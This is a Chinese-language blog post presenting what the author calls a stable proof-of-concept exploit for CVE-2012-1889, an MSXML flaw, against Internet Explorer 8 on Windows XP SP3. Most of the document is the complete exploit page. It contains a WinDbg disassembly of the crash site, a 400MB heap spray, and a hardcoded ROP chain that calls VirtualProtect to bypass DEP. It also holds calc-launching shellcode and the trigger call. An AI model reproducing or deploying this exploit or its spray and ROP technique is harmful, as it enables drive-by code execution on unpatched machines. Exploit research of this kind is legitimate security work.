kg:IE8 CVE20121889 BypassDEP Stable PoC

27 Apr 2017 - evi1m0

猪肉场事件过后我就跑去考古了,原文也不知道啥时候能再公开。这次巧遇前几年比较火的挂马洞 CVE-2012-1889,我测试过程中发现网上好多 Blog 发布的 PoC 在 IE8 下怎么都不好使,甚至连 ShellCode 都跳不过去,调试发现喷射的内存块有问题。也有在用 Metasploit exploit/windows/browser/msxml_get_definition_code_exec 模块的,配置好 PAYLOAD、CMD、SRVHOST 生成后我看了下代码,“效果”按道理讲应该很强大,可惜试一次败一次。:<

我修改了下内存块密度和大小,重置了下 ROP,测试后基本百分百了(注意:仅在 WinXP SP3 + IE8 上验证,ROP 链和 ShellCode 里的地址全是硬编码的,换环境需要重新找 gadget):656417b1040646cbc6afdeded43c4613

<html>
<head>
    <title>IE8 CVE-2012-1889 BypassDEP Stable PoC</title>
</head>
<body>
<!--
    Tested: WinXP 5.1.2600 Service Pack 3 Build 2600 IE8
    Create: 2017-04-25, evi1m0.bat[at]gmail.com
    Crash / pivot site (WinDbg disassembly). The two calls marked "<<<" are indirect
    calls through pointers loaded from memory the heap spray below controls.
    msxml3!_dispatchImpl::InvokeHelper+0x9c:
    037dd75a ff7528          push    dword ptr [ebp+28h]
    037dd75d 8b08            mov     ecx,dword ptr [eax]
    037dd75f ff7524          push    dword ptr [ebp+24h]
    037dd762 ff7520          push    dword ptr [ebp+20h]
    037dd765 57              push    edi
    037dd766 6a03            push    3
    037dd768 ff7514          push    dword ptr [ebp+14h]
    037dd76b 68f8a77d03      push    offset msxml3!GUID_NULL (037da7f8)
    037dd770 53              push    ebx
    037dd771 50              push    eax
    037dd772 ff5118          call    dword ptr [ecx+18h] // <<<
    037dd775 89450c          mov     dword ptr [ebp+0Ch],eax
    037dd778 8b06            mov     eax,dword ptr [esi]
    037dd77a 56              push    esi
    037dd77b ff5008          call    dword ptr [eax+8]   // <<<
    037dd77e eb79            jmp     msxml3!_dispatchImpl::InvokeHelper+0x13b (037dd7f9)
-->
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>
    <script>
        // ------------------------------------------------------------------
        // IE8 / WinXP SP3 PoC for CVE-2012-1889 (MSXML; the <object> tag above
        // instantiates the msxml3 COM object seen in the header disassembly).
        // Everything below is tied to that single build: the ROP gadgets are
        // absolute msvcrt.dll addresses and the shellcode carries absolute
        // kernel32 addresses, so on any other OS/IE build, or with ASLR in
        // effect, the page at best just crashes the tab.
        // Flow: heap-spray {fake vtable + ROP chain + shellcode} so that it
        // sits at 0x0c0c0c0c, plant the pointer 0x0c0c0c08 through an <img>
        // src string, then call the MSXML `definition` method to reach the
        // two indirect calls marked "<<<" in the disassembly above.
        // ------------------------------------------------------------------

        // Shellcode, decoded from the %u escapes (each unit is a little-endian
        // pair of bytes):
        //   jmp +0x16 / pop ebx / xor eax,eax / push eax / push ebx
        //   mov ebx,0x7c8623ad / call ebx      ; consistent with WinExec("calc.exe", 0)
        //   xor eax,eax / push eax
        //   mov ebx,0x7c81cafa / call ebx      ; consistent with ExitProcess(0)
        //   call -0x1b                         ; "calc.exe\0" follows, so its address is popped into ebx
        // The two absolute addresses are NOT resolved at runtime; they look
        // like XP SP3 kernel32 exports -- TODO confirm against the target's
        // kernel32 before reusing this payload anywhere else.
        var shellcode = unescape("%u16eb%u315b%u50c0%ubb53%u23ad"+
                        "%u7c86%ud3ff%uc031%ubb50%ucafa%u7c81%ud"+
                        "3ff%ue5e8%uffff%u63ff%u6c61%u2e63%u7865"+
                        "%u0065");
        // ROP chain (mona-style, msvcrt.dll of XP SP3, no ASLR), 24 dwords.
        // The first eight dwords double as the fake vtable that ends up at
        // 0x0c0c0c0c: `xchg eax,esp # retn` sits at +0x08 and a plain `retn`
        // at +0x18, which matches the `call [eax+8]` / `call [ecx+18h]` sites
        // in the disassembly above. Reading of the layout: the +0x18 call just
        // returns, the +0x08 call pivots ESP into the sprayed block, and the
        // retn sled falls through into the VirtualProtect chain. 0x0c0c0c08
        // lies in the 0x0c0c filler, so [0x0c0c0c08] == 0x0c0c0c0c, i.e. the
        // planted "object" pointer's first dword points at this chain.
        // (Derived from the offsets, not observed -- confirm in a debugger.)
        var rop_chain = unescape(
            // Stack pivot; also the fake vtable, slots +0x00..+0x1c
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]                   +0x00: first dword popped after the pivot
            "%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]         +0x04: swallows the xchg dword below
            "%u5ED5%u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]   +0x08: pivot, EAX must be 0x0c0c0c0c here
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]                   +0x18: plain return for the first "<<<" call
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            // VirtualProtect(lpAddress=ESP, dwSize=0x201, flNewProtect=0x40, lpflOldProtect=writable ptr)
            // on the sprayed page, then `push esp # ret` into the shellcode that follows the chain.
            // Registers are staged first; PUSHAD then lays them out as the call frame
            // (EDI, ESI, EBP, ESP, EBX, EDX, ECX, EAX from low to high address).
            "%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
            "%ubc13%u77be" + // 0x77bebc13 # skip 4 bytes [msvcrt.dll]          -> EBP = return address VirtualProtect will use
            "%u5515%u77c0" + // 0x77c05515 # POP EBX # RETN [msvcrt.dll]
            "%u0201%u0000" + // 0x00000201 # 0x00000201-> ebx                    (dwSize)
            "%u0cb3%u77c2" + // 0x77c20cb3 # POP EDX # RETN [msvcrt.dll]
            "%u0040%u0000" + // 0x00000040 # 0x00000040-> edx                    (flNewProtect = PAGE_EXECUTE_READWRITE)
            "%u09ea%u77c1" + // 0x77c109ea # POP ECX # RETN [msvcrt.dll]
            "%ufa05%u77c2" + // 0x77c2fa05 # &Writable location [msvcrt.dll]     (lpflOldProtect)
            "%u7a41%u77c1" + // 0x77c17a41 # POP EDI # RETN [msvcrt.dll]
            "%u6101%u77c1" + // 0x77c16101 # RETN (ROP NOP) [msvcrt.dll]         -> EDI, first dword popped after PUSHAD
            "%u9dd4%u77c0" + // 0x77c09dd4 # POP ESI # RETN [msvcrt.dll]
            "%uaacc%u77bf" + // 0x77bfaacc # JMP [EAX] [msvcrt.dll]              -> ESI, reached from the ROP NOP; EAX = IAT slot
            "%u1d16%u77bf" + // 0x77bf1d16 # POP EAX # RETN [msvcrt.dll]
            "%u1131%u77be" + // 0x77be1131 = 0x77be1120 (IAT slot of VirtualProtect) with AL pre-biased: 0x20 - 0xEF = 0x31; the ADD AL,0EF in the next gadget restores 0x77be1120 after PUSHAD has already pushed the registers
            "%u67f0%u77c2" + // 0x77c267f0 # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
            "%u1025%u77c2" + // 0x77c21025 # ptr to 'push esp # ret ' [msvcrt.dll]  -> reached when VirtualProtect returns via the "skip 4 bytes" gadget; jumps to the shellcode right after this dword
            "");

        // HeapSpray 400MB
        // Each 0x800-code-unit (0x1000-byte, one page) unit of the pattern is:
        //   0x5F6 units of 0x0c0c | 24-dword ROP chain | 19-unit shellcode | 0x0c0c filler
        // so the chain starts 0xBEC bytes into the pattern. substring(2, ...)
        // below shaves 4 bytes off the front so that, with the string's
        // allocation header in front of the data, the chain is meant to land
        // at page offset 0xc0c and [0x0c0c0c0c] is its first dword. The
        // 0x5F6 / 2 / 0x21 values were tuned empirically against IE8 on XP SP3
        // (see the post) -- changing them changes where the chain lands.
        var fill = "\u0c0c\u0c0c";
        while (fill.length < 0x1000) fill += fill;
        // NOTE(review): padding and evilcode are implicit globals (no var); harmless here, but deliberate.
        padding  = fill.substring(0, 0x5F6);
        evilcode = padding + rop_chain + shellcode;
        evilcode += fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
        while (evilcode.length < 0x100000) evilcode += evilcode; // repeat the one-page pattern up to ~1M code units
        var block = evilcode.substring(2, 0x100000 - 0x21);
        var slide = new Array();
        for (var i = 0; i < 400; i++){
            // substring(0, length) is the JScript idiom for forcing a separate
            // allocation per slot instead of 400 references to one string.
            slide[i] = block.substring(0, block.length);
        }

        // Blocks here after the spray: convenient moment to attach a debugger
        // and check what is at 0x0c0c0c0c before the trigger fires.
        alert("Allocated!");

        // 0c0c0c08 -- plant the object pointer the vulnerable code will dereference.
        var obj = document.getElementById('poc').object;   // the MSXML object from the <object> tag
        var src = unescape("%u0c08%u0c0c");                // dword 0x0c0c0c08 (little-endian), repeated
        while (src.length < 0x1002) src += src;
        src = "\\\\xxx" + src;                             // UNC-looking prefix "\\xxx"
        src = src.substr(0, 0x1000 - 10);                  // 0xFF6 code units; presumably sized to reuse the right heap chunk
        var pic = document.createElement("img");
        pic.src = src;
        pic.nameProp;                                      // property read, presumably to make IE process the src now
        obj.definition(0);                                 // trigger: MSXML `definition` -> InvokeHelper path in the disassembly above
    </script>
</body>
</html>